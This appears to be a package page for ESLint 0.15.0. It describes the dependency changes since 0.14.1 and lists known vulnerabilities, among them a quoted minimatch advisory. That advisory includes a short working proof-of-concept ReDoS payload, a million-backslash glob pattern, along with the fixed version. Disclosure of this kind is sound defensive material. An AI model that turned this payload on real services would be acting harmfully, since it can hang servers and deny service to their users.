ESLint version 0.15.0 represents a notable iteration in the evolution of this popular JavaScript linting tool, building upon the foundation laid by its predecessor, version 0.14.1. While the core description remains consistent – "An AST-based pattern checker for JavaScript" – the devil is in the details, particularly concerning dependency updates, which can impact compatibility and performance. A key difference lies in the updated espree dependency, moving from version 1.8.1 to 1.9.1. This reflects enhancements in JavaScript parsing capabilities, potentially allowing ESLint to better understand and analyze newer JavaScript syntax.
Developers should also note the release dates. Version 0.15.0 was released on February 21, 2015, while version 0.14.1 came out on February 8, 2015. This signifies a relatively short development cycle between the two, suggesting a focus on incremental improvements and bug fixes rather than a complete overhaul. The listed dependencies and devDependencies such as mocha, chai, browserify are useful for contributing to and testing the library itself, version updates in those packages don't usually affect the end-user of the library.
For those using ESLint, upgrading to 0.15.0 might be beneficial to leverage the updated parser. However, as always, it's crucial to test the new version with your existing codebase to ensure no regressions or unexpected behavior arises from these dependency updates. This incremental update signifies the project's commitment to supporting modern JavaScript standards and promoting code quality.
All the vulnerabilities related to the version 0.15.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.